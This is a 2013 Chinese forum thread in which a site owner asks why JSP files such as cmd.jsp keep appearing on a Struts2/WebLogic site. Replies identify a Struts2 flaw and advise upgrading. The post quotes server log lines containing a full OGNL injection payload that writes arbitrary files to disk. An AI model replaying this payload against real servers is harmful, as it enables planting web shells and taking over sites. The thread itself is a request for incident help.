我们的网站 受到了如下攻击 这个怎么解决 有人帮帮忙

y358625210 2013-08-12 10:35:09
项目是后台SSH2 前台是extjs web容器:weblogic11
在主页下面 莫名写入了许多JSP 文件 cmd.jsp file.jsp test.jsp
怎么防止 攻击 这个是属于那种攻击呢?? 是不是sql注入

查看weblogic日志 发现:
10.1.1.8 - - [29/七月/2013:15:51:57 +0800] "POST /login.action?('%5Cu0023_memberAccess%5B%

5C'allowStaticMethodAccess%5C'%5D')(meh)=true&(aaa)(('%5Cu0023context%5B%

5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5Cu003d%5Cu0023foo')(%5Cu0023foo%

5Cu003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('%5C43req%

5C75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('%5C43fos%5C75new%

5C40java.io.FileOutputStream(%5C43req.getParameter(%22path%22))')(d))&(i3)(('%5C43fos.write

(%5C43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('%5C43fos.close()')(d)) HTTP/1.1" 200

12665

10.1.1.8 - - [29/七月/2013:15:59:00 +0800] "POST /login.action?('%5Cu0023_memberAccess%5B%5C'allowStaticMethodAccess%5C'%5D')(meh)=true&(aaa)(('%5Cu0023context%5B%5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5Cu003d%5Cu0023foo')(%5Cu0023foo%5Cu003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('%5C43req%5C75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('%5C43fos%5C75new%5C40java.io.FileOutputStream(%5C43req.getParameter(%22path%22))')(d))&(i3)(('%5C43fos.write(%5C43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('%5C43fos.close()')(d)) HTTP/1.1" 200 12665
...全文
1096 10 打赏 收藏 转发到动态 举报
写回复
用AI写文章
10 条回复
切换为时间正序
请发表友善的回复…
发表回复
c0py_ninj4 2014-03-09
  • 打赏
  • 举报
回复
面对这方面的防可以尝试从这几个方面去做: 0.限制一些用户的非法关键字提交。 这需要数据库管理员对一些敏感字符进行过滤机制,防止某些用户的脚本注入 1.对于网站架构进行分布,后台站点分级装载 2. SQL 控制语句进行严格的过滤 3.为站点开启防注入系统机制 网上Google就知道 还有更多,建议楼主有兴趣可以手动screaming
cogbee 2013-11-12
  • 打赏
  • 举报
回复
肯定有上传漏洞。不然人家怎么传东西上来的。查看你们网站权限,一些过滤机制等,限制上传这种类型的文件。 如果是系统框架的问题的话,那问题就大了。
gird4r 2013-10-25
  • 打赏
  • 举报
回复
去升级你的框架到最新版本
AHAU10 2013-09-10
  • 打赏
  • 举报
回复
搞个蜜罐让他再攻一次。
多一秒 2013-08-20
  • 打赏
  • 举报
回复
是啊,目前网上的方式都尝试过了,都不行了,看来只能放弃了。
ianiam 2013-08-16
  • 打赏
  • 举报
回复
不就是struts2的框架漏洞么。。能够执行java命令。。。 你注意看URL里面是有new FileOutStream的。。。 解决方法就是去使用最新的struts2的包。。。
空心兜兜 2013-08-13
  • 打赏
  • 举报
回复
关键是这几个文件如何上传的
gxgyj 2013-08-13
  • 打赏
  • 举报
回复
是吧,给软件公司看看,叫他们出防止方案

9,505

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧